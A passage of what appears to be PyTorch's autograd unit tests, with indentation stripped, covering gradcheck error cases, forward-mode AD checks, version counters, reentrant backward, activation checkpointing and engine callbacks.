check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while computing batched grad (prints a big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when a runtime error is encountered while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
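# GradcheckError is raised on failure and (as also exercised below) can be caught as a
# RuntimeError, so both assertRaisesRegex checks target the same underlying error.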
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
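# bad_fn scales the tangent of y by 1.1 whenever a forward-AD level is active, so its
# forward-mode Jacobian disagrees with the numerical one and gradcheck must report it.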
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_gradcheck_forward_ad_runs_with_no_requires_grad(self):
# Currently requires_grad is used as an easy way for gradcheck to know
# which inputs of the function are meant to be differentiable.
# This test checks that, when the inputs are passed to the function, they do not have
# requires_grad=True, even though they may have requires_grad=True when passed
# to gradcheck.
class UserFn(Function):
@staticmethod
def forward(ctx, x, y):
if fwAD._current_level >= 0:
self.assertFalse(x.requires_grad)
self.assertFalse(y.requires_grad)
return x.clone(), y.clone()
@staticmethod
def jvp(ctx, x_t, y_t):
return x_t, y_t
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=False, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=False)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=False)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=True)
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=False)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=True)
def test_gradcheck_forward_ad_respects_requires_grad(self):
# Currently requires_grad is used as an easy way for gradcheck to know
# which inputs of the function are meant to be differentiable
jvp_count = [0]
class UserFn(Function):
@staticmethod
def forward(ctx, x, y):
return x.clone(), y.clone()
@staticmethod
def jvp(ctx, x_t, y_t):
jvp_count[0] += 1
return x_t, y_t
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=False, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=False)
self.assertEqual(jvp_count[0], 2) # (2) once per input
jvp_count = [0]
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=False)
self.assertEqual(jvp_count[0], 6) # (+4): (once with normal ZT (+1), once with efficient ZT (+1)) for each input (x2)
jvp_count = [0]
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=True)
self.assertEqual(jvp_count[0], 12) # (+6): (compute batch of 2 with vmap (+1), with a loop (+2)) for each input (x2)
jvp_count = [0]
# Repeat the previous test except we mark one input with requires_grad=False
# NB: with a single differentiable input, _test_undefined_forward_mode only adds (+1), not (+2)!
# The other counts are likewise halved because only one input is perturbed.
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=False)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=True)
self.assertEqual(jvp_count[0], 5) # 1 + 1 + 3
def test_gradcheck_check_forward_or_backward_only(self):
"""Depending on settings for check_forward_ad and check_backward_ad, the
correct codepaths should be reached (or not reached)
"""
fwd_fail_err_msg = "FAIL FWD"
bwd_fail_err_msg = "FAIL BWD"
class UserFn(Function):
@staticmethod
def forward(ctx, foo, fwd_bad, bwd_bad):
ctx.fwd_bad = fwd_bad
ctx.bwd_bad = bwd_bad
return foo * 2
@staticmethod
def vjp(ctx, gO):
if ctx.bwd_bad:
raise RuntimeError(bwd_fail_err_msg)
else:
return 2 * gO, None, None
@staticmethod
def jvp(ctx, gI, _1, _2):
if ctx.fwd_bad:
raise RuntimeError(fwd_fail_err_msg)
else:
return 2 * gI
for fast_mode in (True, False):
for check_forward_ad in (True, False):
for check_backward_ad in (True, False):
for fwd_bad in (True, False):
for bwd_bad in (True, False):
fwd_should_fail = fwd_bad and check_forward_ad
bwd_should_fail = bwd_bad and check_backward_ad
def run():
gradcheck(UserFn.apply, (x, fwd_bad, bwd_bad), check_forward_ad=check_forward_ad,
check_backward_ad=check_backward_ad, check_undefined_grad=check_backward_ad,
check_batched_grad=check_backward_ad, fast_mode=fast_mode)
x = torch.rand(2, dtype=torch.double, requires_grad=True)
if not check_forward_ad and not check_backward_ad:
with self.assertRaisesRegex(AssertionError, "Expected at least one of"):
run()
continue
if not fwd_should_fail and not bwd_should_fail:
run()
else:
# If both fail, backward AD failure "hides" forward AD failure
if fwd_should_fail:
fail_msg = fwd_fail_err_msg
if bwd_should_fail:
fail_msg = bwd_fail_err_msg
with self.assertRaisesRegex(RuntimeError, fail_msg):
run()
def test_gradcheck_forward_ad_batched_grad(self):
x = torch.rand(2, dtype=torch.double, requires_grad=True)
# multiple inputs and outputs with non-tensor inputs
def fn1(a: torch.Tensor, b: int):
return a.clone(), a + 1
gradcheck(fn1, (x, 1), check_forward_ad=True, check_backward_ad=False, check_batched_grad=False,
check_undefined_grad=False, check_batched_forward_grad=True)
# unrelated inputs: tangent for c is None
def fn2(a: torch.Tensor, c: torch.Tensor):
return a.clone()
gradcheck(fn2, (x, x.clone()), check_forward_ad=True, check_backward_ad=False, check_batched_grad=False,
check_undefined_grad=False, check_batched_forward_grad=True)
class Fn(Function):
@staticmethod
def forward(ctx, foo):
return foo * 2
@staticmethod
def vjp(ctx, gO):
return gO * 2
@staticmethod
def jvp(ctx, gI):
torch.randn_like(gI)
return gI * 2
msg = "vmap: We do not yet support calling random operations inside of vmap"
with self.assertRaisesRegex(RuntimeError, msg):
gradcheck(Fn.apply, (x,), check_forward_ad=True, check_batched_forward_grad=True)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because it doesn't work on Windows")
def test_thread_shutdown(self):
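# Runs a small autograd program in a separate process and checks that the engine emits the
# torch.autograd.thread_shutdown API-usage log entry when its worker threads exit.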
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
@slowTest
@parametrize("input_requires_grad", [True, False])
def test_checkpointing_without_reentrant(self, input_requires_grad):
"""
Basic test for checkpoint without reentrant autograd.
"""
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
# Run model with and without checkpointing and verify gradients are
# equivalent, regardless of whether the inputs require grad or not.
module_copy = deepcopy(module)
feat_combined = []
feat_combined_no_checkpoint = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = input_requires_grad
data_r_copy = data_r.clone()
feat_r = checkpoint(module, data_r, use_reentrant=False)
feat_combined.append(feat_r)
feat_r_no_checkpoint = module_copy(data_r)
feat_combined_no_checkpoint.append(feat_r_no_checkpoint)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
mean_combined_no_checkpoint = torch.stack(feat_combined_no_checkpoint).mean()
mean_combined_no_checkpoint.backward()
for checkpoint_param, param in zip(module.parameters(), module_copy.parameters()):
self.assertEqual(checkpoint_param.grad, param.grad)
def test_checkpoint_valid_reset_on_error(self):
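# Reentrant checkpointing is incompatible with torch.autograd.grad(); after that expected
# failure, the internal "checkpoint valid" state must be reset so a later backward() works.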
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
@parametrize("use_reentrant", [True, False])
def test_checkpointing_without_reentrant_detached_tensor(self, use_reentrant):
class NoGradModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(2, 2, bias=False)
self.lin2 = nn.Linear(2, 2, bias=False)
def forward(self, x):
with torch.no_grad():
return self.lin2(self.linear(x))
module = NoGradModule()
err_ctx = (
self.assertRaisesRegex(
RuntimeError,
"none of output has requires_grad=True"
)
if use_reentrant
else contextlib.suppress()
)
a = torch.randn(2, 2, requires_grad=True)
for _ in range(3):
with err_ctx:
# out does not require grad
out = checkpoint(module, a, use_reentrant=use_reentrant)
# Make loss require grad, otherwise we would run into
# "element 0 of tensors does not require grad and does not have a grad_fn"
out += a
out.sum().backward()
def test_checkpointing_without_reentrant_correct_grad(self):
"""
Verifies that correct gradients are calculated for checkpoint
without reentrant autograd, for both backward() and autograd.grad().
"""
a = torch.randn(2, 2, requires_grad=True)
b = torch.exp(a).sum()
b.backward()
b_grad = a.grad
a.grad = None
c = checkpoint(torch.exp, a, use_reentrant=False).sum()
c.backward()
c_grad = a.grad
a.grad = None
d = checkpoint(torch.exp, a, use_reentrant=False).sum()
d_grad, = torch.autograd.grad(d, (a,))
self.assertEqual(b_grad, c_grad)
self.assertEqual(b_grad, d_grad)
def test_checkpointing_without_reentrant_dataparallel(self):
"""
Verifies gradient correctness when checkpoint without reentrant autograd
is used in conjunction with DataParallel.
"""
class LinearModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(2, 2, bias=False)
def forward(self, inp):
return self.linear(inp)
a = torch.randn(2, 2, requires_grad=True)
if torch.cuda.is_available():
a = a.cuda()
model = LinearModule()
if torch.cuda.is_available():
model = model.cuda()
b = deepcopy(model)(a).sum()
b.backward()
b_grad = a.grad
a.grad = None
module = torch.nn.DataParallel(deepcopy(model))
c = checkpoint(module, a, use_reentrant=False).sum()
c.backward()
c_grad = a.grad
self.assertEqual(b_grad, c_grad)
def test_checkpointing_without_reentrant_parameter_used_in_an_out(self):
"""
Ensures that gradient hooks are only called once per tensor.
"""
w = torch.randn(10, 10, requires_grad=True)
count = 0
def hook(grad):
nonlocal count
count += 1
w.register_hook(hook)
x = torch.rand(10, 10, requires_grad=True)
h = w * x # Using w outside the checkpoint
out = checkpoint(lambda x: w * x, h, use_reentrant=False) # Using w inside the checkpoint
out.sum().backward()
# should only call hook once
self.assertEqual(count, 1)
def test_checkpointing_without_reentrant_arbitrary_input_output(self):
"""
Ensures checkpointing without reentrant autograd works with functions
with arbitrary input/output structures.
"""
class MyModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer = torch.nn.Linear(5, 5, bias=False)
def forward(self, dict_input):
tensor = dict_input["tensor"]
return {
"result": self.layer(tensor)
}
model_no_checkpoint = MyModel()
model_checkpoint_without_reentrant = deepcopy(model_no_checkpoint)
inp = {
"tensor": torch.randn(5, 5)
}
out_no_checkpoint = model_no_checkpoint(inp)["result"].sum()
out_checkpoint = checkpoint(
model_checkpoint_without_reentrant,
inp,
use_reentrant=False
)["result"].sum()
self.assertEqual(out_checkpoint, out_no_checkpoint)
out_no_checkpoint.backward()
out_checkpoint.backward()
for param, checkpoint_param in zip(model_no_checkpoint.parameters(), model_checkpoint_without_reentrant.parameters()):
self.assertEqual(param.grad, checkpoint_param.grad)
def test_callback_adds_callback(self):
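# A callback queued on the execution engine during backward may itself queue another
# callback; both should run exactly once, hence the final count of 2.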
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
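# The hook on the leaf `param` removes itself, runs a reentrant backward to compute a
# penalty term, then restores param.grad and returns the adjusted gradient.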
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
